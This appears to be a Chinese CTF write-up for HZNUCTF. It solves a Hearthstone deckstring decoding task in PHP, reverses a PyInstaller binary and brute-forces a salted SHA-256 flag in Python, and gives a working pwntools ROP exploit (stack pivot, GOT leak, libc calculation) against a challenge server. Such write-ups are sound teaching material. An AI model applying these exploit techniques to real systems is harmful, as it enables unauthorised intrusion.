Misc

致我那逝去的青春

炉石传说的代码解析,参考 https://zhangshuqiao.org/2018-12/炉石卡组代码解析/

直接贴php代码好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
<?php
$deckstring = "AAECAZoFKNAFhAeMBtIGngXIBrwFzgnmBpIJpgnSBrYH5gaSCaYJ0ga2B4IGugm2B9AF/gOIBPQIiAnQBb4GiAngA8wI8ge2B+oDvga2B6gFmgjyB+IJAAA=";
$binary = base64_decode($deckstring);
$hex = bin2hex($binary);
$arr = str_split($hex, 2);
$arr = array_map("hexdec", $arr);

function read_varint(&$data) {
    $shift = 0;
    $result = 0;
    do {
        $c = array_shift($data);
        $result |= ($c & 0x7f) << $shift;
        $shift += 7;
    }
    while ($c & 0x80);
    return $result;
}

function parse_deck($data) {
    $reserve = read_varint($data);
    if ($reserve != 0) {
        printf("Invalid deckstring");
        die;
    }
    $version = read_varint($data);
    if ($version != 1) {
        printf("Unsupported deckstring version %s", $version);
        die;
    }
    $format = read_varint($data);
    $heroes = [];
    $num_heroes = read_varint($data);
    for ($i = 0; $i < $num_heroes; $i++) {
        $heroes[] = read_varint($data);
    }
    $cards = [];
    $num_cards_x1 = read_varint($data);
    for ($i = 0; $i < $num_cards_x1; $i++) {
        $card_id = read_varint($data);
        $cards[] = [$card_id, 1];
    }
    $num_cards_x2 = read_varint($data);
    for ($i = 0; $i < $num_cards_x2; $i++) {
        $card_id = read_varint($data);
        $cards[] = [$card_id, 2];
    }
    $num_cards_xn = read_varint($data);
    for ($i = 0; $i < $num_cards_xn; $i++) {
        $card_id = read_varint($data);
        $count = read_varint($data);
        $cards[] = [$card_id, $count];
    }
    return [$cards, $heroes, $format];
}

$a = parse_deck($arr);
print_r($a);
?>

image-20230712140539812

然后将其中的数组都除以十转ascii即可

image-20230712140612381

flag:HZNUCTF{WuwU_WuwU_My_H34rtHSt0ne_1S_Die}

还有python的一个库可以直接出

image-20230712140647756

Snake

很经典,直接上pyinstxtractor

image-20230712140704409

然后进去根据struct把snake.pyc的头补上

但是发现struct的头被去掉了

image-20230712140711837

没关系,因为解压出来的还有base_library的文件,里面随便找个头补上就好了

image-20230712140721307

image-20230712140727548

image-20230712140736760

然后在线反编译或者uncompyle6都行,我选择在线

image-20230712140749993

发现flag_is_me的关键字样,复制出来看看

image-20230712140759290

发现就是有三个盐值的sha256,中间#5%e4%bd%8d ascii+digits+_还提示了是五位的字母和数字还有下划线爆破

image-20230712140811014

去源文件找盐值

第一个第二个很明显

image-20230712140818076

第三个就是每位减个下标就好

image-20230712140824748

然后就是这样子

image-20230712140835586

最后去爆破就好了

image-20230712140849031

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import hashlib 
import string 
salt_1 = 'mxx307shuai' 
salt_2 = 'mxx407shuai' 
salt_3 = 'mggdashuaibi' 
salt = salt_1 + salt_2 + salt_3 
dic=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '_']
for a1 in dic:
    for a2 in dic:
        for a3 in dic:
            for a4 in dic:
                for a5 in dic:
                    data='HZNUCTF{'+a1+a2+a3+a4+a5+'}' #5%e4%bd%8d ascii+digits+_ 
                    salt_data = salt + data 
                    data_sha = hashlib.sha256(salt_data.encode('utf-8')).hexdigest() 
                    if data_sha=='c08521f3c380906d05ee8afbc7fa2943afb3788d9cec94c1b86771ee35ca4738':
                        print(data)
#c08521f3c380906d05ee8afbc7fa2943afb3788d9cec94c1b86771ee35ca4738"

得到flag:HZNUCTF{1s_R4}

Pwn

easy_rw

Pwn佬说很简单,没什么好说的,就是迁移加个rw,直接贴脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwncy import *
context(arch = "amd64",log_level ="debug",endian = "little")

p,elf,libc = load("easy_rw",remote_libc = "./libc.so.6",ip_port = "43.142.252.111:10001")
debug(p,'no-tmux',0x00000000004012E0)
read = 0x0000000000401338
migration = 0x404000
puts_plt = elf.plt['puts']
puts_got = elf.got["puts"]
leave_ret = 0x000000000040126f
read_plt = elf.plt["read"]
pop_rbp = 0x00000000004011dd
pop_rdi = 0x00000000004013c3
pop_rsi_15 = 0x00000000004013c1

ru(">> ")
payload = flat(
 {
 0x40: migration + 0x500,
 0x48: read,
 },filler = b"\x00",length = 0x50)
sl(payload)
pause()
ret = 0x4044c0 - 0x8
payload2 = flat({
 0x0: [pop_rdi,puts_got],
 0x10: [puts_plt,pop_rbp],
 0x20: migration + 0x800,
 0x28: read,
 # 0x30: elf.symbols['main'],
 0x40: [ret,leave_ret],
 },filler = b"\x00")
sl(payload2)
log_info("puts_addr")
puts_addr = recv_libc()
pause()
system,binsh,libc_base = local_search("puts",puts_addr,libc)
pop_rsi = libc_base + next(libc.search(asm("pop rsi; ret")))
ret = 0x4044800 - 0x40
payload3 = flat({
 0x0: [pop_rsi,migration  + 0xf00],
 0x10: [read_plt,pop_rdi],
 0x20: migration + 0xf00,
 0x28:puts_plt,
 0x40: migration + 0x800 - 0x40 - 0x8,
 0x48: [pop_rdi,3,leave_ret],
 },filler = b"\x00")
sl(payload3)
itr()

image-20230712141014332

得到flag:flag{e1sy_r0p_byp1ss_0rw!}